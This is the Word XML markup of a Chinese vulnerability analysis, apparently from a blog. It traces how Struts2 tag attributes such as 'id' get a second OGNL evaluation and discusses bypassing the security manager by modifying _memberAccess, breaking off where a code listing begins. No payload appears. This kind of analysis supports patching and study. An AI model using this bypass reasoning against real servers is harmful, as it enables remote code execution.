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856" w:rsidRPr="003A5856" w:rsidRDefault="003A5856" w:rsidP="003A5856">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="240"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Helvetica"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Helvetica"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>关于这个</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Helvetica"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Struts2</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Helvetica"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>的漏洞感慨颇深，首先根据官方漏洞的描述，大家应该能很快找到漏洞出现的位置，基本上</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Helvetica"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Struts2</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Helvetica"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>里面大部分标签都是存在</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Helvetica"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>OGNL</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Helvetica"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>代码二次执行的问题，问题虽然能很容易的发现，但是在最新版本里面要想成功利用该漏洞执行任意代码，需要绕过</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Helvetica"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Struts2</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Helvetica"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>的安全管理器，所以说整个漏洞变成了一个如何绕过</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Helvetica"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Struts2</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Helvetica"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>安全管理器的问题，我花了很多时间在想办法如何去绕过</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Helvetica"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Struts2</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Helvetica"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>的安全管理器，一开始我从来没有想过</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Helvetica"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Struts2</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Helvetica"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>里面的</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Helvetica"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>_memberAccess</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Helvetica"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>变量可以被修改，因为前几次</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Helvetica"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Struts2</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Helvetica"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Helvetica"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>RCE</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Helvetica"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>问题中</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Helvetica"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>_memberAccess</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Helvetica"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>变量已经被纳入黑名单了，同时我把</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Helvetica"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Struts2</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Helvetica"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>的安全管理器的源代码也看了一遍，似乎都很合理，但是直到安恒研究院的同学把</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Helvetica"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>POC</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Helvetica"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>丢出来的时候，</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Helvetica"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>_memberAccess</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Helvetica"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>变量依然可以被修改，真的是让人匪夷所思。所以本文也主要是围绕这个</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Helvetica"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bypass</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Helvetica"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>安全管理器来进行探讨，看看究竟是什么原因导致了</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Helvetica"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bypass</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Helvetica"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>安全管理器。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A5856" w:rsidRPr="003A5856" w:rsidRDefault="003A5856" w:rsidP="003A5856">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="312" w:line="240" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>漏洞详情</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A5856" w:rsidRPr="003A5856" w:rsidRDefault="003A5856" w:rsidP="003A5856">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>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从官方的描述看来这次是</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Strut2</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>标签的问题，而且还是标签属性值</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>OGNL</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>二次解析的问题，利用条件比较苛刻，所以说这个漏洞威力并没有那么大，下面直接给出一部分存在问题的标签，其他的标签大家自己去找，这里只列出来几个比较典型的，这里主要说两类标签属性值，一个是</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>属性，在</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>org.apache.struts2.components.UIBean</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>类中我们很容易发现</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>参数在</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>setID</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>时已经进行了第一次</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>OGNL</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>表达式的执行，如下图</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:noProof/>
          <w:color w:val="2CA6CB"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0BF6CDBC" wp14:editId="163F666A">
            <wp:extent cx="5580380" cy="2000770"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="15" name="图片 15" descr="https://www.iswin.org/attach/struts2_id_1.png">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId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swin.org/attach/struts2_id_1.png">
                      <a:hlinkClick r:id="rId8" tooltip="&quot;&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2000770"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>然后紧接着在</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>org.apache.struts2.components.UIBean.populateComponentHtmlId(Form)</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>方法中进行了第二次的</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>OGNL</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>表达式解析，如下如的</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:noProof/>
          <w:color w:val="2CA6CB"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E37AC60" wp14:editId="08DC8F82">
            <wp:extent cx="5580380" cy="3679421"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="14" name="图片 14" descr="https://www.iswin.org/attach/struts2_id_2.png">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId1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swin.org/attach/struts2_id_2.png">
                      <a:hlinkClick r:id="rId10" tooltip="&quot;&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679421"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>findStringIfAltSyntax</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>方法最终会调用</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>findString</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>方法进行</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>值的第二次</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>OGNL</w:t>
      </w:r>
      <w:r w:rsidRPr="003A5856">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="413F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>表达式执行</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="95"/>
        <w:gridCol w:w="4049"/>
      </w:tblGrid>
      <w:tr w:rsidR="003A5856" w:rsidRPr="003A5856" w:rsidTr="003A5856">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="003A5856" w:rsidRPr="003A5856" w:rsidRDefault="003A5856" w:rsidP="003A585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textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="666666"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="666666"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>1</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2</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3</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4</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5</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6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="003A5856" w:rsidRPr="003A5856" w:rsidRDefault="003A5856" w:rsidP="003A585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CCCCCC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="CC99CC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>protected</w:t>
            </w:r>
            <w:r w:rsidRPr="003A5856">
              <w:rPr>
                <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Consolas"/>
                <w:color w:val="6699CC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
